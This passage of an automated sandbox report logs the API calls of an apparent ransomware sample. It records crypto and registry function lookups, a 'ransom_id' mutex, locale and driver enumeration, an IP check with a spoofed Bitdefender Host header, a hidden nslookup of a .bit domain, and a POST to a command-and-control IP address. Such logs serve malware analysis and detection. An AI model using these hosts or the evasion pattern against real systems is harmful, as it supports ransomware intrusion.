| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x741378b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Process32FirstW, address_out = 0x7413f5a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetTempPathW, address_out = 0x74146b30 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x74137710 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x74131ba0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x76ec2bd0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenA, address_out = 0x74138c80 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateProcessW, address_out = 0x7413b000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x74147b30 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessorFeaturePresent, address_out = 0x74139bf0 |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x76840000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = BeginPaint, address_out = 0x76878a60 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = wsprintfW, address_out = 0x7686f890 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = TranslateMessage, address_out = 0x7685d9b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = LoadCursorW, address_out = 0x7685abd0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = LoadIconW, address_out = 0x7685a740 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = MessageBoxA, address_out = 0x768bfec0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetMessageW, address_out = 0x76874f60 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = EndPaint, address_out = 0x76878a80 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = DestroyWindow, address_out = 0x768792b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = RegisterClassExW, address_out = 0x76859580 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = ShowWindow, address_out = 0x76878e60 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = CreateWindowExW, address_out = 0x76859860 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = SendMessageW, address_out = 0x76855d90 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = DispatchMessageW, address_out = 0x768562e0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = DefWindowProcW, address_out = 0x76f1aee0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = UpdateWindow, address_out = 0x768683a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = wsprintfA, address_out = 0x768704a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetForegroundWindow, address_out = 0x76878cb0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = SetWindowLongW, address_out = 0x76853780 |
|
1 | |
| Module | Load | module_name = GDI32.dll, base_address = 0x764e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = TextOutW, address_out = 0x76588830 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = FreeSid, address_out = 0x76de0440 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegSetValueExW, address_out = 0x76ddf7f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegCreateKeyExW, address_out = 0x76ddfa20 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegCloseKey, address_out = 0x76ddf620 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptExportKey, address_out = 0x76ddfb30 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptAcquireContextW, address_out = 0x76de0590 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGetKeyParam, address_out = 0x76df6bf0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptReleaseContext, address_out = 0x76de0650 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptImportKey, address_out = 0x76ddfaf0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptEncrypt, address_out = 0x76df6b30 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenKey, address_out = 0x76de3910 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptDestroyKey, address_out = 0x76de0400 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetUserNameW, address_out = 0x76de1030 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryValueExW, address_out = 0x76ddf330 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegOpenKeyExW, address_out = 0x76ddf350 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = AllocateAndInitializeSid, address_out = 0x76ddf660 |
|
1 | |
| Module | Load | module_name = SHELL32.dll, base_address = 0x750e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteW, address_out = 0x7527d9f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shell32.dll, function = SHGetSpecialFolderPathW, address_out = 0x7528f9c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteExW, address_out = 0x7527e690 |
|
1 | |
| Module | Load | module_name = CRYPT32.dll, base_address = 0x74c50000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\crypt32.dll, function = CryptStringToBinaryA, address_out = 0x74c6d6d0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\crypt32.dll, function = CryptBinaryToStringA, address_out = 0x74c6e0f0 |
|
1 | |
| Module | Load | module_name = WININET.dll, base_address = 0x6fdc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetCloseHandle, address_out = 0x6fe8d200 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = HttpAddRequestHeadersW, address_out = 0x6fe3bec0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = HttpSendRequestW, address_out = 0x6fe86ef0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetConnectW, address_out = 0x6fe745f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = HttpOpenRequestW, address_out = 0x6fe40fd0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetOpenW, address_out = 0x6fe88490 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetReadFile, address_out = 0x6fe47320 |
|
1 | |
| Module | Load | module_name = PSAPI.DLL, base_address = 0x74560000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\psapi.dll, function = EnumDeviceDrivers, address_out = 0x74561340 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\psapi.dll, function = GetDeviceDriverBaseNameW, address_out = 0x745613a0 |
|
1 |
Thread 0xc34
55
24
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters, value_name = Domain, data = 0 |
|
1 | |
| System | Get Info | type = Windows Directory, result_out = C:\Windows |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = ProcessorNameString, data = 73 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = Identifier, data = 73 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x76e90000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x76f5d9b0 |
|
1 | |
| Mutex | Create | mutex_name = Global\pc_group=WORKGROUP&ransom_id=58de2295a283c81 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters, value_name = Domain, data = 0 |
|
1 | |
| System | Get Info | type = Windows Directory, result_out = C:\Windows |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = ProcessorNameString, data = 73 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = Identifier, data = 73 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x76e90000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x76f5d9b0 |
|
1 | |
| System | Get Time | type = Ticks, time = 95218 |
|
1 | |
| System | Get Computer Name | result_out = X2VS1CUM |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters, value_name = Domain, data = 0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Control Panel\International |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Control Panel\International, value_name = LocaleName, data = 101 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Keyboard Layout\Preload |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Keyboard Layout\Preload, value_name = 1, data = 48 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Keyboard Layout\Preload |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Keyboard Layout\Preload, value_name = 2, data = 48 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion, value_name = productName, data = 87 |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| System | Get Info | type = Windows Directory, result_out = C:\Windows |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = ProcessorNameString, data = 73 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = Identifier, data = 73 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x76e90000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x76f5d9b0 |
|
1 | |
| Inet | Open Session | user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36, access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Open Session | user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36, access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Inet | Open Connection | protocol = HTTP, server_name = ipv4bot.whatismyipaddress.com, server_port = 80 |
|
1 | |
| Inet | Open HTTP Request | http_verb = GET, http_version = HTTP/1.1, target_resource = /, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Inet | Add HTTP Request Headers | headers = Host: bitdefender.com |
|
1 | |
| Inet | Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = ipv4bot.whatismyipaddress.com/ |
|
1 | |
| Inet | Read Response | size = 10238, size_out = 14 |
|
1 | |
| Inet | Read Response | size = 10238, size_out = 0 |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Module | Get Filename | process_name = c:\users\nd9e1fyi\appdata\roamingqtp35.exe, file_name_orig = C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe, size = 256 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe, type = size |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe, size = 285192, size_out = 285192 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x76e90000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x76f5d9b0 |
|
1 | |
| Inet | Open Session | user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36, access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| File | Create Pipe | pipe_name = Anonymous read pipe, size = 0 |
|
1 | |
| File | Create Pipe | pipe_name = Anonymous read pipe, size = 0 |
|
1 | |
| Process | Create | process_name = nslookup politiaromana.bit ns1.virmach.ru, os_pid = 0xd48, startup_flags = STARTF_USESHOWWINDOW, STARTF_USESTDHANDLES, show_window = SW_HIDE |
|
1 | |
| File | Read | size = 4096, size_out = 101 |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Open Session | user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36, access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Inet | Open Connection | protocol = HTTP, server_name = 77.244.219.151, server_port = 80 |
|
1 | |
| Inet | Open HTTP Request | http_verb = POST, http_version = HTTP/1.1, target_resource = eighph?soref=eezaui, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Inet | Add HTTP Request Headers | headers = Host: bitdefender.com |
|
1 | |
| Inet | Send HTTP Request | headers = Content-Type: application/x-www-form-urlencoded, url = 77.244.219.151/eighph?soref=eezaui |
|
1 | |
| Inet | Read Response | size = 204798, size_out = 552 |
|
1 | |
| Inet | Read Response | size = 204798, size_out = 0 |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x76e90000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x76f5d9b0 |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| System | Get Time | type = Ticks, time = 102843 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
1 |
Thread 0xd00
261
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Driver | Enumerate | load_addresses = 1703688 |
|
1 | |
| Driver | Enumerate | load_addresses = 4784128 |
|
1 | |
| Driver | Get Name | load_address = 3483488256 |
|
1 | |
| Driver | Get Name | load_address = 3491663872 |
|
1 | |
| Driver | Get Name | load_address = 3467825152 |
|
1 | |
| Driver | Get Name | load_address = 1801781248 |
|
1 | |
| Driver | Get Name | load_address = 1802371072 |
|
1 | |
| Driver | Get Name | load_address = 1802436608 |
|
1 | |
| Driver | Get Name | load_address = 1802895360 |
|
1 | |
| Driver | Get Name | load_address = 1803091968 |
|
1 | |
| Driver | Get Name | load_address = 1803223040 |
|
1 | |
| Driver | Get Name | load_address = 1803288576 |
|
1 | |
| Driver | Get Name | load_address = 1803354112 |
|
1 | |
| Driver | Get Name | load_address = 1797259264 |
|
1 | |
| Driver | Get Name | load_address = 1797914624 |
|
1 | |
| Driver | Get Name | load_address = 1798307840 |
|
1 | |
| Driver | Get Name | load_address = 1798766592 |
|
1 | |
| Driver | Get Name | load_address = 1798963200 |
|
1 | |
| Driver | Get Name | load_address = 1799684096 |
|
1 | |
| Driver | Get Name | load_address = 1800536064 |
|
1 | |
| Driver | Get Name | load_address = 1800667136 |
|
1 | |
| Driver | Get Name | load_address = 1800863744 |
|
1 | |
| Driver | Get Name | load_address = 1800929280 |
|
1 | |
| Driver | Get Name | load_address = 1819148288 |
|
1 | |
| Driver | Get Name | load_address = 1819738112 |
|
1 | |
| Driver | Get Name | load_address = 1819803648 |
|
1 | |
| Driver | Get Name | load_address = 1819934720 |
|
1 | |
| Driver | Get Name | load_address = 1820000256 |
|
1 | |
| Driver | Get Name | load_address = 1820131328 |
|
1 | |
| Driver | Get Name | load_address = 1803550720 |
|
1 | |
| Driver | Get Name | load_address = 1803943936 |
|
1 | |
| Driver | Get Name | load_address = 1804075008 |
|
1 | |
| Driver | Get Name | load_address = 1804206080 |
|
1 | |
| Driver | Get Name | load_address = 1804337152 |
|
1 | |
| Driver | Get Name | load_address = 1804533760 |
|
1 | |
| Driver | Get Name | load_address = 1805123584 |
|
1 | |
| Driver | Get Name | load_address = 1805254656 |
|
1 | |
| Driver | Get Name | load_address = 1805647872 |
|
1 | |
| Driver | Get Name | load_address = 1805778944 |
|
1 | |
| Driver | Get Name | load_address = 1805975552 |
|
1 | |
| Driver | Get Name | load_address = 1806499840 |
|
1 | |
| Driver | Get Name | load_address = 1806630912 |
|
1 | |
| Driver | Get Name | load_address = 1806761984 |
|
1 | |
| Driver | Get Name | load_address = 1807024128 |
|
1 | |
| Driver | Get Name | load_address = 1809252352 |
|
1 | |
| Driver | Get Name | load_address = 1809317888 |
|
1 | |
| Driver | Get Name | load_address = 1810497536 |
|
1 | |
| Driver | Get Name | load_address = 1811021824 |
|
1 | |
| Driver | Get Name | load_address = 1811218432 |
|
1 | |
| Driver | Get Name | load_address = 1813708800 |
|
1 | |
| Driver | Get Name | load_address = 1814167552 |
|
1 | |
| Driver | Get Name | load_address = 1814364160 |
|
1 | |
| Driver | Get Name | load_address = 1815085056 |
|
1 | |
| Driver | Get Name | load_address = 1815543808 |
|
1 | |
| Driver | Get Name | load_address = 1815871488 |
|
1 | |
| Driver | Get Name | load_address = 1816133632 |
|
1 | |
| Driver | Get Name | load_address = 1816264704 |
|
1 | |
| Driver | Get Name | load_address = 1816788992 |
|
1 | |
| Driver | Get Name | load_address = 1817968640 |
|
1 | |
| Driver | Get Name | load_address = 1818099712 |
|
1 | |
| Driver | Get Name | load_address = 1818165248 |
|
1 | |
| Driver | Get Name | load_address = 1818230784 |
|
1 | |
| Driver | Get Name | load_address = 1818296320 |
|
1 | |
| Driver | Get Name | load_address = 1818427392 |
|
1 | |
| Driver | Get Name | load_address = 1832648704 |
|
1 | |
| Driver | Get Name | load_address = 1834680320 |
|
1 | |
| Driver | Get Name | load_address = 1834811392 |
|
1 | |
| Driver | Get Name | load_address = 1834942464 |
|
1 | |
| Driver | Get Name | load_address = 1824522240 |
|
1 | |
| Driver | Get Name | load_address = 1824718848 |
|
1 | |
| Driver | Get Name | load_address = 1824784384 |
|
1 | |
| Driver | Get Name | load_address = 1825112064 |
|
1 | |
| Driver | Get Name | load_address = 1825767424 |
|
1 | |
| Driver | Get Name | load_address = 1825898496 |
|
1 | |
| Driver | Get Name | load_address = 1826095104 |
|
1 | |
| Driver | Get Name | load_address = 1826226176 |
|
1 | |
| Driver | Get Name | load_address = 1826750464 |
|
1 | |
| Driver | Get Name | load_address = 1827340288 |
|
1 | |
| Driver | Get Name | load_address = 1827405824 |
|
1 | |
| Driver | Get Name | load_address = 1827471360 |
|
1 | |
| Driver | Get Name | load_address = 1827536896 |
|
1 | |
| Driver | Get Name | load_address = 1827602432 |
|
1 | |
| Driver | Get Name | load_address = 1827930112 |
|
1 | |
| Driver | Get Name | load_address = 1828192256 |
|
1 | |
| Driver | Get Name | load_address = 1828323328 |
|
1 | |
| Driver | Get Name | load_address = 1828388864 |
|
1 | |
| Driver | Get Name | load_address = 1828519936 |
|
1 | |
| Driver | Get Name | load_address = 1828651008 |
|
1 | |
| Driver | Get Name | load_address = 1829044224 |
|
1 | |
| Driver | Get Name | load_address = 1829240832 |
|
1 | |
| Driver | Get Name | load_address = 1829699584 |
|
1 | |
| Driver | Get Name | load_address = 1829830656 |
|
1 | |
| Driver | Get Name | load_address = 1830354944 |
|
1 | |
| Driver | Get Name | load_address = 1831403520 |
|
1 | |
| Driver | Get Name | load_address = 1831469056 |
|
1 | |
| Driver | Get Name | load_address = 1831534592 |
|
1 | |
| Driver | Get Name | load_address = 1831600128 |
|
1 | |
| Driver | Get Name | load_address = 1832124416 |
|
1 | |
| Driver | Get Name | load_address = 1832189952 |
|
1 | |
| Driver | Get Name | load_address = 1827799040 |
|
1 | |
| Driver | Get Name | load_address = 1830879232 |
|
1 | |
| Driver | Get Name | load_address = 1831010304 |
|
1 | |
| Driver | Get Name | load_address = 1831206912 |
|
1 | |
| Driver | Get Name | load_address = 1831337984 |
|
1 | |
| Driver | Get Name | load_address = 1818558464 |
|
1 | |
| Driver | Get Name | load_address = 1827864576 |
|
1 | |
| Driver | Get Name | load_address = 1818689536 |
|
1 | |
| Driver | Get Name | load_address = 1818886144 |
|
1 | |
| Driver | Get Name | load_address = 1816920064 |
|
1 | |
| Driver | Get Name | load_address = 1817247744 |
|
1 | |
| Driver | Get Name | load_address = 1344339968 |
|
1 | |
| Driver | Get Name | load_address = 1360658432 |
|
1 | |
| Driver | Get Name | load_address = 1346371584 |
|
1 | |
| Driver | Get Name | load_address = 1817378816 |
|
1 | |
| Driver | Get Name | load_address = 1851523072 |
|
1 | |
| Driver | Get Name | load_address = 1347878912 |
|
1 | |
| Driver | Get Name | load_address = 1347944448 |
|
1 | |
| Driver | Get Name | load_address = 1852178432 |
|
1 | |
| Driver | Get Name | load_address = 1852375040 |
|
1 | |
| Driver | Get Name | load_address = 1852506112 |
|
1 | |
| Driver | Get Name | load_address = 1852637184 |
|
1 | |
| Driver | Get Name | load_address = 1852768256 |
|
1 | |
| Driver | Get Name | load_address = 1835008000 |
|
1 | |
| Driver | Get Name | load_address = 1836187648 |
|
1 | |
| Driver | Get Name | load_address = 1836384256 |
|
1 | |
| Driver | Get Name | load_address = 1836908544 |
|
1 | |
| Driver | Get Name | load_address = 1837170688 |
|
1 | |
| Driver | Get Name | load_address = 1837301760 |
|
1 | |
| Driver | Get Name | load_address = 1837432832 |
|
1 | |
| Driver | Get Name | load_address = 1837760512 |
|
1 | |
| Driver | Get Name | load_address = 1838481408 |
|
1 | |
| Driver | Get Name | load_address = 1839071232 |
|
1 | |
| Driver | Get Name | load_address = 1839857664 |
|
1 | |
| Driver | Get Name | load_address = 1839988736 |
|
1 | |
| Driver | Get Name | load_address = 1840316416 |
|
1 | |
| Driver | Get Name | load_address = 1840513024 |
|
1 | |
| Driver | Get Name | load_address = 1840709632 |
|
1 | |
| Driver | Enumerate | load_addresses = 1703688 |
|
1 | |
| Driver | Enumerate | load_addresses = 4784128 |
|
1 | |
| Driver | Get Name | load_address = 3483488256 |
|
1 | |
| Driver | Get Name | load_address = 3491663872 |
|
1 | |
| Driver | Get Name | load_address = 3467825152 |
|
1 | |
| Driver | Get Name | load_address = 1801781248 |
|
1 | |
| Driver | Get Name | load_address = 1802371072 |
|
1 | |
| Driver | Get Name | load_address = 1802436608 |
|
1 | |
| Driver | Get Name | load_address = 1802895360 |
|
1 | |
| Driver | Get Name | load_address = 1803091968 |
|
1 | |
| Driver | Get Name | load_address = 1803223040 |
|
1 | |
| Driver | Get Name | load_address = 1803288576 |
|
1 | |
| Driver | Get Name | load_address = 1803354112 |
|
1 | |
| Driver | Get Name | load_address = 1797259264 |
|
1 | |
| Driver | Get Name | load_address = 1797914624 |
|
1 | |
| Driver | Get Name | load_address = 1798307840 |
|
1 | |
| Driver | Get Name | load_address = 1798766592 |
|
1 | |
| Driver | Get Name | load_address = 1798963200 |
|
1 | |
| Driver | Get Name | load_address = 1799684096 |
|
1 | |
| Driver | Get Name | load_address = 1800536064 |
|
1 | |
| Driver | Get Name | load_address = 1800667136 |
|
1 | |
| Driver | Get Name | load_address = 1800863744 |
|
1 | |
| Driver | Get Name | load_address = 1800929280 |
|
1 | |
| Driver | Get Name | load_address = 1819148288 |
|
1 | |
| Driver | Get Name | load_address = 1819738112 |
|
1 | |
| Driver | Get Name | load_address = 1819803648 |
|
1 | |
| Driver | Get Name | load_address = 1819934720 |
|
1 | |
| Driver | Get Name | load_address = 1820000256 |
|
1 | |
| Driver | Get Name | load_address = 1820131328 |
|
1 | |
| Driver | Get Name | load_address = 1803550720 |
|
1 | |
| Driver | Get Name | load_address = 1803943936 |
|
1 | |
| Driver | Get Name | load_address = 1804075008 |
|
1 | |
| Driver | Get Name | load_address = 1804206080 |
|
1 | |
| Driver | Get Name | load_address = 1804337152 |
|
1 | |
| Driver | Get Name | load_address = 1804533760 |
|
1 | |
| Driver | Get Name | load_address = 1805123584 |
|
1 | |
| Driver | Get Name | load_address = 1805254656 |
|
1 | |
| Driver | Get Name | load_address = 1805647872 |
|
1 | |
| Driver | Get Name | load_address = 1805778944 |
|
1 | |
| Driver | Get Name | load_address = 1805975552 |
|
1 | |
| Driver | Get Name | load_address = 1806499840 |
|
1 | |
| Driver | Get Name | load_address = 1806630912 |
|
1 | |
| Driver | Get Name | load_address = 1806761984 |
|
1 | |
| Driver | Get Name | load_address = 1807024128 |
|
1 | |
| Driver | Get Name | load_address = 1809252352 |
|
1 | |
| Driver | Get Name | load_address = 1809317888 |
|
1 | |
| Driver | Get Name | load_address = 1810497536 |
|
1 | |
| Driver | Get Name | load_address = 1811021824 |
|
1 | |
| Driver | Get Name | load_address = 1811218432 |
|
1 | |
| Driver | Get Name | load_address = 1813708800 |
|
1 | |
| Driver | Get Name | load_address = 1814167552 |
|
1 | |
| Driver | Get Name | load_address = 1814364160 |
|
1 | |
| Driver | Get Name | load_address = 1815085056 |
|
1 | |
| Driver | Get Name | load_address = 1815543808 |
|
1 | |
| Driver | Get Name | load_address = 1815871488 |
|
1 | |
| Driver | Get Name | load_address = 1816133632 |
|
1 | |
| Driver | Get Name | load_address = 1816264704 |
|
1 | |
| Driver | Get Name | load_address = 1816788992 |
|
1 | |
| Driver | Get Name | load_address = 1817968640 |
|
1 | |
| Driver | Get Name | load_address = 1818099712 |
|
